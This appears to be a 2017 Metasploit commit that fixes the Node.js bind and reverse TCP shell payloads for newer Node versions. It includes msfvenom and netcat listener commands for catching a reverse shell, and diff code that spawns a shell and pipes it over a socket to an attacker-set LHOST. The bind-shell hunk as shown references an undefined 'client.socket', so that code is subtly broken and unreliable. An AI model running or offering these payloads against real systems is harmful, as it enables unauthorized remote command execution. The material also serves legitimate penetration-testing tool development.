handle missing util.pump in nodejs shell payloads

coffeetocode · busterb · commit d3f7f6eb668b · 2017-09-19T03:42:54.000-05:00
Modern NodeJS (since 5.3.0) has removed util.pump in favor of stream.pipe. On current versions the nodejs tcp shell payloads error out: ``` $ node --version v7.10.0 $ msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node <snip> TypeError: util.pump is not a function at Socket.<anonymous> ([stdin]:1:405) at Object.onceWrapper (events.js:293:19) at emitNone (events.js:86:13) at Socket.emit (events.js:188:7) at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1080:10) ``` With this change, bind and reverse tcp should be tolerant of both new and older versions. *Reference* nodejs/node#2531 *Verification steps* 1. Set up a handler (either exploit/multi/handler or simple nc) ``` $ nc -l -v 7777 ``` 2. Use patched version with various versions of node: ``` msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node ``` 3. Confirm both old and new versions of node result in shell, not error.
diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb
@@ -18,8 +18,13 @@ def nodejs_bind_tcp
         var server = net.createServer(function(socket) {  
           var sh = cp.spawn(cmd, []);
           socket.pipe(sh.stdin);
-          util.pump(sh.stdout, socket);
-          util.pump(sh.stderr, socket);
+          if (typeof util.pump === "undefined") {
+            sh.stdout.pipe(client.socket);
+            sh.stderr.pipe(client.socket);          
+          } else {
+            util.pump(sh.stdout, client.socket);
+            util.pump(sh.stderr, client.socket);
+          }
         });
         server.listen(#{datastore['LPORT']});
       })();
@@ -53,8 +58,13 @@ def nodejs_reverse_tcp(opts={})
         var client = this;
         client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
           client.socket.pipe(sh.stdin);
-          util.pump(sh.stdout, client.socket);
-          util.pump(sh.stderr, client.socket);
+          if (typeof util.pump === "undefined") {
+            sh.stdout.pipe(client.socket);
+            sh.stderr.pipe(client.socket);          
+          } else {
+            util.pump(sh.stdout, client.socket);
+            util.pump(sh.stderr, client.socket);
+          }
         });
       })();
     EOS
